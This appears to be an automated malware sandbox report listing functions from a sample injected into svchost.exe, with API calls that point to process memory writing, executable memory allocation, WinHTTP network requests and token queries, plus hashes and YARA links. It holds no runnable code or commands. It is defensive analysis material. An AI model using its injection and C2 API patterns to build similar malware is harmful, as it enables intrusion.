Instruction ID: dabaced31705c96dc6f0a04d0252672024b71e9b7cabf701c7d1bea4a8cc8430
Opcode Fuzzy Hash: df0d4710188bbc4545ffb25a3de640365ec90d346391f8a801651d14009fcf39
Instruction Fuzzy Hash: 02118872500224ABEB314E59CC48FBBB7ACEF81B20B19461DFD1AE7204D629ED0586E1

Function 007B0000 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00000688,00001000,00000040), ref: 007B0065

Memory Dump Source

Source File: 00000003.00000002.2122091864.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_44qxnhoiecq.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a2fcc1d63792b2b86ce2226597d373f45588513d77cf013809a06473fc1d853c
Instruction ID: 4fdc2b0ea71fc8425d7cbef45217d0808fa653986713f2b9317f16b6af58a4c0
Opcode Fuzzy Hash: a2fcc1d63792b2b86ce2226597d373f45588513d77cf013809a06473fc1d853c
Instruction Fuzzy Hash: A1012B75940308BFD7102F70CC08FCF3BA9AFC8720F414515F99AA7281DD7C98808A94

Function 007C05BD Relevance: 1.3, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,007C0093), ref: 007C05CA

Memory Dump Source

Source File: 00000003.00000002.2122123168.00000000007C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7c0000_44qxnhoiecq.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a9a4fa599d775aa83550951cd01ab53a510ae55495336f8eeb8bc52accc60b48
Instruction ID: 65ce390d9ce214b0b9a70d03eb22b0c205847d94ce1a40b3c250883ace489992
Opcode Fuzzy Hash: a9a4fa599d775aa83550951cd01ab53a510ae55495336f8eeb8bc52accc60b48
Instruction Fuzzy Hash: EAB012B22C038477EB304E614C0EF8A3661ABC8FA3F350000FB106B1C48AF0E8018624

Non-executed Functions

Function 10001E70 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 83nativeCOMMON

Download Yara Rule

APIs

NtReadVirtualMemory.NTDLL ref: 10001EA0
NtWriteVirtualMemory.NTDLL ref: 10001F06
NtSignalAndWaitForSingleObject.NTDLL ref: 10001F2D
NtReadVirtualMemory.NTDLL ref: 10001F63
NtSignalAndWaitForSingleObject.NTDLL ref: 10001F91
NtClose.NTDLL ref: 10001FC1
NtClose.NTDLL ref: 10001FCF

Strings

H, xrefs: 10001F10
H, xrefs: 10001EC7
H, xrefs: 10001F71

Memory Dump Source

Source File: 00000003.00000003.2121150163.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000003.2121188246.0000000010004000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121211972.0000000010005000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121244000.0000000010006000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000003.2121269427.0000000010000000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_3_10000000_44qxnhoiecq.jbxd

Similarity

API ID: MemoryVirtual$CloseObjectReadSignalSingleWait$Write
String ID: H$H$H
API String ID: 2084818639-1989617792
Opcode ID: 8c1ad99cee8b214af55f9319549a430532395830dc3796db70fa6c318a35bef8
Instruction ID: d3cf83964699c326543a64d7e9576905f73cd3ca186e7bac4399ed8c9f110ffe
Opcode Fuzzy Hash: 8c1ad99cee8b214af55f9319549a430532395830dc3796db70fa6c318a35bef8
Instruction Fuzzy Hash: 23412772604B8186EB60CF66F4907AE73A8FB89BC9F515126DE8D43A1CDF35C499CB40

Analysis Process: svchost.exePID: 1984, Parent PID: 8020COMMON

Execution Graph

Execution Coverage:	3.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	8.5%
Total number of Nodes:	1552
Total number of Limit Nodes:	28

Executed Functions

Function 0000000140002900 Relevance: 42.8, APIs: 28, Instructions: 848memorycomsleepCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000E2B0: ??2@YAPEAX_K@Z.MSVCRT ref: 000000014000E2D4
Part of subcall function 000000014000E2B0: memset.MSVCRT ref: 000000014000E2F0
Part of subcall function 000000014000E2B0: LoadLibraryExW.KERNELBASE ref: 000000014000E36F
Part of subcall function 000000014000E2B0: GetProcAddress.KERNEL32 ref: 000000014000E3BB

SetCurrentDirectoryW.KERNELBASE ref: 0000000140002987
GetTickCount.KERNEL32 ref: 0000000140002994
srand.MSVCRT ref: 000000014000299D
CoInitializeEx.COMBASE ref: 00000001400029A7
CoInitializeSecurity.COMBASE ref: 00000001400029E2
CoCreateInstance.COMBASE ref: 0000000140002A4B
??2@YAPEAX_K@Z.MSVCRT ref: 0000000140002B08
HeapFree.KERNEL32 ref: 0000000140002C08
HeapFree.KERNEL32 ref: 0000000140002C42
_time64.MSVCRT ref: 0000000140002C92
_time64.MSVCRT ref: 0000000140002D41
Sleep.KERNEL32 ref: 0000000140002D88
??2@YAPEAX_K@Z.MSVCRT ref: 0000000140002E08

Part of subcall function 000000014000C3F0: LoadLibraryExW.KERNELBASE ref: 000000014000C46D
Part of subcall function 000000014000C3F0: LoadLibraryExW.KERNELBASE ref: 000000014000C4CD
Part of subcall function 000000014000C3F0: GetProcAddress.KERNEL32 ref: 000000014000C500
Part of subcall function 000000014000C3F0: GetProcAddress.KERNEL32 ref: 000000014000C533
Part of subcall function 000000014000C3F0: GetProcAddress.KERNEL32 ref: 000000014000C566
Part of subcall function 000000014000C3F0: GetProcAddress.KERNEL32 ref: 000000014000C599
Part of subcall function 000000014000C3F0: GetProcAddress.KERNEL32 ref: 000000014000C5CC

HeapFree.KERNEL32 ref: 000000014000378D
FreeLibrary.KERNELBASE ref: 00000001400037B6
CoUninitialize.COMBASE ref: 00000001400037E4

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: AddressProc$FreeLibrary$??2@HeapLoad$Initialize_time64$CountCreateCurrentDirectoryInstanceSecuritySleepTickUninitializememsetsrand
String ID:
API String ID: 2921336483-0
Opcode ID: a823052580928bd824f163ca6e897ae67aad89d72ca9790ee6e18b48b9a0a523
Instruction ID: 68504463b67ef1b29f9b7d47820dd4a867066b0ffea43447dab23e93c07c9791
Opcode Fuzzy Hash: a823052580928bd824f163ca6e897ae67aad89d72ca9790ee6e18b48b9a0a523
Instruction Fuzzy Hash: 7C923BB2604B8585EB62DF22E8503ED37A4F788BC8F444426EB4A57BB9DF39C945C740

Function 000000014000C3F0 Relevance: 18.2, APIs: 12, Instructions: 170
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

LoadLibraryExW.KERNELBASE ref: 000000014000C46D
LoadLibraryExW.KERNELBASE ref: 000000014000C4CD
GetProcAddress.KERNEL32 ref: 000000014000C500
GetProcAddress.KERNEL32 ref: 000000014000C533
GetProcAddress.KERNEL32 ref: 000000014000C566
GetProcAddress.KERNEL32 ref: 000000014000C599
GetProcAddress.KERNEL32 ref: 000000014000C5CC
GetProcAddress.KERNEL32 ref: 000000014000C5FF
GetProcAddress.KERNEL32 ref: 000000014000C632
GetProcAddress.KERNEL32 ref: 000000014000C665
GetProcAddress.KERNEL32 ref: 000000014000C694
GetProcAddress.KERNEL32 ref: 000000014000C6C3

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$memset
String ID:
API String ID: 2529764867-0
Opcode ID: e0cf9d58dca152765d060bada16e2a2e5b7f9f137bbe49111f327c7c28c01f36
Instruction ID: 5d690c7c490bd090bdbf8754a9ee11121f4ef864398ce79e0bcd1f78a3723631
Opcode Fuzzy Hash: e0cf9d58dca152765d060bada16e2a2e5b7f9f137bbe49111f327c7c28c01f36
Instruction Fuzzy Hash: 2A911871615B8585EA23DB16F8603E933B0FB8C7C8F44142AA78D4B67AEF79D905CB40

Function 0000000140001080 Relevance: 54.4, APIs: 36, Instructions: 412
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPEAX_K@Z.MSVCRT ref: 0000000140001142
SysAllocString.OLEAUT32 ref: 0000000140001166
SysFreeString.OLEAUT32 ref: 00000001400011AD
??_V@YAXPEAX@Z.MSVCRT ref: 00000001400011BC
??3@YAXPEAX@Z.MSVCRT ref: 00000001400011C5
VariantInit.OLEAUT32 ref: 000000014000128D
VariantInit.OLEAUT32 ref: 00000001400012AF
SysAllocString.OLEAUT32 ref: 00000001400012DA
??2@YAPEAX_K@Z.MSVCRT ref: 0000000140001313
SysAllocString.OLEAUT32 ref: 000000014000133A
??2@YAPEAX_K@Z.MSVCRT ref: 0000000140001360
SysAllocString.OLEAUT32 ref: 0000000140001384
SysFreeString.OLEAUT32 ref: 0000000140001408
??_V@YAXPEAX@Z.MSVCRT ref: 0000000140001417
??3@YAXPEAX@Z.MSVCRT ref: 0000000140001420
SysFreeString.OLEAUT32 ref: 000000014000143A
??_V@YAXPEAX@Z.MSVCRT ref: 0000000140001449
??3@YAXPEAX@Z.MSVCRT ref: 0000000140001452
VariantClear.OLEAUT32 ref: 000000014000145D
VariantClear.OLEAUT32 ref: 0000000140001467
VariantClear.OLEAUT32 ref: 0000000140001471
VariantInit.OLEAUT32 ref: 00000001400014ED
VariantInit.OLEAUT32 ref: 0000000140001509
VariantInit.OLEAUT32 ref: 0000000140001525

Part of subcall function 0000000140001000: ??2@YAPEAX_K@Z.MSVCRT ref: 000000014000101A
Part of subcall function 0000000140001000: SysAllocString.OLEAUT32 ref: 000000014000103A

??2@YAPEAX_K@Z.MSVCRT ref: 0000000140001569
SysAllocString.OLEAUT32 ref: 000000014000158D
SysFreeString.OLEAUT32 ref: 0000000140001608
??_V@YAXPEAX@Z.MSVCRT ref: 0000000140001617
??3@YAXPEAX@Z.MSVCRT ref: 0000000140001620
SysFreeString.OLEAUT32 ref: 0000000140001648
??_V@YAXPEAX@Z.MSVCRT ref: 0000000140001657
??3@YAXPEAX@Z.MSVCRT ref: 0000000140001660
VariantClear.OLEAUT32 ref: 000000014000166F
VariantClear.OLEAUT32 ref: 0000000140001679
VariantClear.OLEAUT32 ref: 0000000140001683

Part of subcall function 000000014000CC50: GetCurrentProcess.KERNEL32 ref: 000000014000CC79
Part of subcall function 000000014000CC50: OpenProcessToken.ADVAPI32 ref: 000000014000CC8D
Part of subcall function 000000014000CC50: GetTokenInformation.KERNELBASE ref: 000000014000CCC3

HeapFree.KERNEL32 ref: 00000001400016E3

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: StringVariant$AllocClearFree$??2@??3@Init$ProcessToken$CurrentHeapInformationOpen
String ID:
API String ID: 932316019-0
Opcode ID: 4bd45e6a1165e3b44a20c2cec4adbc21042b19c0b393bff6292b254aae24aa57
Instruction ID: 73fd58dbfa8de5e771e7542bc31443fe366ed4c037a12749888c4d0630df74ea
Opcode Fuzzy Hash: 4bd45e6a1165e3b44a20c2cec4adbc21042b19c0b393bff6292b254aae24aa57
Instruction Fuzzy Hash: CE123F72601B8586EB26CF66E8503ED73B0FB98BC8F044115EF4A5BAA9DF79C645C340

Function 0000000140001730 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 295
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT ref: 00000001400018E3
memcpy.MSVCRT ref: 0000000140001910
_time64.MSVCRT ref: 00000001400019F4
_localtime64.MSVCRT ref: 0000000140001A05
wcsftime.MSVCRT ref: 0000000140001A6C
HeapFree.KERNEL32 ref: 0000000140001BB0
HeapFree.KERNEL32 ref: 0000000140001BC3

Part of subcall function 000000014000E580: LoadLibraryA.KERNEL32 ref: 000000014000E5BE
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E5E0

Strings

<, xrefs: 00000001400019FA

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeapmemcpy$AddressLibraryLoadProc_localtime64_time64wcsftime
String ID: <
API String ID: 2118791860-4251816714
Opcode ID: bc341a25e09894bafeecd124b04850cfcfec052a11b0728d968ebb8a01a9e0fb
Instruction ID: 7b3512f6305f96da40dd492177f831db69bdef71e394fa92b440c6adabb0c7d5
Opcode Fuzzy Hash: bc341a25e09894bafeecd124b04850cfcfec052a11b0728d968ebb8a01a9e0fb
Instruction Fuzzy Hash: 3ED15176600B8586EB21DF26E4503EE73A0FB89BC8F544125EF8A47B69EF39C945C740

Function 0000000140017E00 Relevance: 9.1, APIs: 6, Instructions: 133
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStartupInfoW.KERNEL32 ref: 0000000140017E22
Sleep.KERNEL32 ref: 0000000140017E58
_amsg_exit.MSVCRT ref: 0000000140017E6E
_initterm.MSVCRT ref: 0000000140017EF5
exit.MSVCRT ref: 0000000140017FBA
_cexit.MSVCRT ref: 0000000140017FC8

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: InfoSleepStartup_amsg_exit_cexit_inittermexit
String ID:
API String ID: 2456207614-0
Opcode ID: 5360f1c04b7edbaa5d775165d56065c574be986e94f26ab25caa58a34893f057
Instruction ID: dd7bef42800268433d42df4e9d168aee914250b00c3c1566757323a5b0bfa38a
Opcode Fuzzy Hash: 5360f1c04b7edbaa5d775165d56065c574be986e94f26ab25caa58a34893f057
Instruction Fuzzy Hash: 1951063160564086EB629F56E880BAA33F1F34C7C4F54442AFB8A8B6B5DB7AC985C741

Function 000000014000E2B0 Relevance: 6.1, APIs: 4, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPEAX_K@Z.MSVCRT ref: 000000014000E2D4
memset.MSVCRT ref: 000000014000E2F0
LoadLibraryExW.KERNELBASE ref: 000000014000E36F
GetProcAddress.KERNEL32 ref: 000000014000E3BB

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: ??2@AddressLibraryLoadProcmemset
String ID:
API String ID: 2223267934-0
Opcode ID: 9fb993bdcbc7801996536c00c379125405486b2bffe6ba4f148ffbbb4ef29a0d
Instruction ID: 81936db8f0c84c524282d08abef79f670da5901e330344387f2b7120425cec9c
Opcode Fuzzy Hash: 9fb993bdcbc7801996536c00c379125405486b2bffe6ba4f148ffbbb4ef29a0d
Instruction Fuzzy Hash: B031A832610B8095EB22DF16F8543DE77A0F788BC8F884426EF995766ADF39CA45C740

Function 00000001400175A0 Relevance: 4.6, APIs: 3, Instructions: 86
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 0000000140017624
CreateMutexExW.KERNELBASE ref: 00000001400176BD
exit.MSVCRT ref: 00000001400176EA

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: DescriptorSecurity$ConvertCreateMutexStringexitmemset
String ID:
API String ID: 3507615276-0
Opcode ID: 7e300d048cb3985760b73ca4915f977cc0e0939f1735c7342c0fd7b69dda5c44
Instruction ID: b79e1125e13a50f3d4fcebabcacaf9d25f3fc3441ac5dd85b6d2232f2856bb17
Opcode Fuzzy Hash: 7e300d048cb3985760b73ca4915f977cc0e0939f1735c7342c0fd7b69dda5c44
Instruction Fuzzy Hash: 6D416D72204B8581DB228F16E4507EA77B0FB8DBC5F448066EB8D47769DF79C946CB40

Function 000000014000CC50 Relevance: 4.6, APIs: 3, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 000000014000CC79
OpenProcessToken.ADVAPI32 ref: 000000014000CC8D
GetTokenInformation.KERNELBASE ref: 000000014000CCC3

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: ProcessToken$CurrentInformationOpen
String ID:
API String ID: 2743777493-0
Opcode ID: ef76699d8adb88cef57f707c04710a59947ad96b4545d95d8a55f2534c219ce9
Instruction ID: c74a2c0aa10743c207ec1e219136a5575fa09d5bc2334c12703a290418d10ba9
Opcode Fuzzy Hash: ef76699d8adb88cef57f707c04710a59947ad96b4545d95d8a55f2534c219ce9
Instruction Fuzzy Hash: 65311A72615B8686DB61CF16E4947EEBBE4FBC8B84F044126DB8943B28DF38D549CB40

Function 000001DD0EE20000 Relevance: 1.7, APIs: 1, Instructions: 229
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.2121724866.000001DD0EE20000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001DD0EE20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1dd0ee20000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44c00fefa8dee2791824ffa64c28be73b2be40f84a10099b5124b8c7914ad373
Instruction ID: 594aa605081497ddfe7d26924722aa9f1a46709b3c6b3a29cbe7ffccb02227dc
Opcode Fuzzy Hash: 44c00fefa8dee2791824ffa64c28be73b2be40f84a10099b5124b8c7914ad373
Instruction Fuzzy Hash: A071D670618A099FDB94EF2CC484F55B7E1FBA8304F60065EE44EC7695D732E892CB81

Function 0000000140017DB4 Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__wgetmainargs.MSVCRT ref: 0000000140017DEC

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: __wgetmainargs
String ID:
API String ID: 1709950718-0
Opcode ID: 1964c3ef71c522d8cac27037b9fad85a0d91a07838b54d6a462ab3137a1b4d49
Instruction ID: 6aec88c559ee83b68dd4777cae1c7270f0cd78b8661183991cc7666a73bb9bd7
Opcode Fuzzy Hash: 1964c3ef71c522d8cac27037b9fad85a0d91a07838b54d6a462ab3137a1b4d49
Instruction Fuzzy Hash: A1E09274605B429AFB438B02F8407C03760B30D3C8F80401EEA4853736DB3CCA6ACB40

Non-executed Functions

Function 00000001400179C0 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 245
memorytimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 0000000140017A02
WinHttpCrackUrl.WINHTTP ref: 0000000140017A33
WinHttpOpen.WINHTTP ref: 0000000140017B19
WinHttpSetTimeouts.WINHTTP ref: 0000000140017B48
WinHttpConnect.WINHTTP ref: 0000000140017B5A
WinHttpOpenRequest.WINHTTP ref: 0000000140017BF0
WinHttpSendRequest.WINHTTP ref: 0000000140017C1A
WinHttpReceiveResponse.WINHTTP ref: 0000000140017C2D
WinHttpQueryHeaders.WINHTTP ref: 0000000140017C66
WinHttpQueryDataAvailable.WINHTTP ref: 0000000140017CA0
WinHttpReadData.WINHTTP ref: 0000000140017CF5

Part of subcall function 000000014000E580: LoadLibraryA.KERNEL32 ref: 000000014000E5BE
Part of subcall function 000000014000E580: GetProcAddress.KERNEL32 ref: 000000014000E5E0

WinHttpCloseHandle.WINHTTP ref: 0000000140017D26
WinHttpCloseHandle.WINHTTP ref: 0000000140017D34
WinHttpCloseHandle.WINHTTP ref: 0000000140017D3D
HeapFree.KERNEL32 ref: 0000000140017D5A
HeapFree.KERNEL32 ref: 0000000140017D74
HeapFree.KERNEL32 ref: 0000000140017D96

Strings

h, xrefs: 0000000140017A14

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: Http$CloseFreeHandleHeap$DataOpenQueryRequest$AddressAvailableConnectCrackHeadersLibraryLoadProcReadReceiveResponseSendTimeoutsmemset
String ID: h
API String ID: 924098880-2439710439
Opcode ID: 5381ae17751d1395b7447e3cb6081e5e3852b3b2c1ef0d6eebbe8c66b7312723
Instruction ID: 1498001942143cf4250ef2d81509e8fca94ec240472a1244b462215344734eb3
Opcode Fuzzy Hash: 5381ae17751d1395b7447e3cb6081e5e3852b3b2c1ef0d6eebbe8c66b7312723
Instruction Fuzzy Hash: FCA19031604A858AE762CF27A8547EA77B1FB8DBC8F044115EF4D4BBA8DF3AC5458740

Function 0000000140003860 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 365
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000000014000D420: WinHttpOpen.WINHTTP ref: 000000014000D49C

HeapFree.KERNEL32 ref: 0000000140003A0A
HeapFree.KERNEL32 ref: 0000000140003A1F
WinHttpCloseHandle.WINHTTP ref: 0000000140003B1C
WinHttpConnect.WINHTTP ref: 0000000140003B3C
HeapFree.KERNEL32 ref: 0000000140003C24
HeapFree.KERNEL32 ref: 0000000140003D1C
HeapFree.KERNEL32 ref: 0000000140003D37
HeapFree.KERNEL32 ref: 0000000140003D52
HeapFree.KERNEL32 ref: 0000000140003D6D
HeapFree.KERNEL32 ref: 0000000140003D88
HeapFree.KERNEL32 ref: 0000000140003D9D
WinHttpCloseHandle.WINHTTP ref: 0000000140003DAD
WinHttpCloseHandle.WINHTTP ref: 0000000140003DBB
WinHttpCloseHandle.WINHTTP ref: 0000000140003DC9

Part of subcall function 000000014000E0C0: memset.MSVCRT ref: 000000014000E1F2

HeapFree.KERNEL32 ref: 0000000140003DE5

Strings

gfff, xrefs: 0000000140003CC0

Memory Dump Source

Source File: 00000006.00000002.2121435304.0000000140001000.00000020.00000400.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2121388506.0000000140000000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121478123.0000000140019000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121510393.0000000140020000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2121547317.0000000140021000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_svchost.jbxd

Yara matches

Similarity

API ID: FreeHeap$Http$CloseHandle$ConnectOpenmemset
String ID: gfff
API String ID: 2669603317-1553575800
Opcode ID: a95b2586bbd460e69ec2be79498c36138f74c0e8d271ec2a65c1289937f3eb6e
Instruction ID: e375e4b6913abfcb066fb2510dea88db1f1922a69a85b8abfbf5752ff8901941
Opcode Fuzzy Hash: a95b2586bbd460e69ec2be79498c36138f74c0e8d271ec2a65c1289937f3eb6e
Instruction Fuzzy Hash: 64F17D72600B8482EB93DF16E8547EA27A8FB8DBD4F04411AEB8A577B5DF38C945C740

Function 0000000140015340 Relevance: 22.9, APIs: 15, Instructions: 362
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapFree.KERNEL32 ref: 00000001400153B0
HeapFree.KERNEL32 ref: 00000001400153CC
HeapFree.KERNEL32 ref: 00000001400153E8
HeapFree.KERNEL32 ref: 0000000140015404
_time64.MSVCRT ref: 00000001400155E4
_time64.MSVCRT ref: 000000014001566F
HeapFree.KERNEL32 ref: 000000014001569D
HeapFree.KERNEL32 ref: 0000000140015706
HeapFree.KERNEL32 ref: 0000000140015722
HeapFree.KERNEL32 ref: 000000014001573E
HeapFree.KERNEL32 ref: 000000014001575A
HeapFree.KERNEL32 ref: 0000000140015776
HeapFree.KERNEL32 ref: 000000014001578B
HeapFree.KERNEL32 ref: 0000000140015420

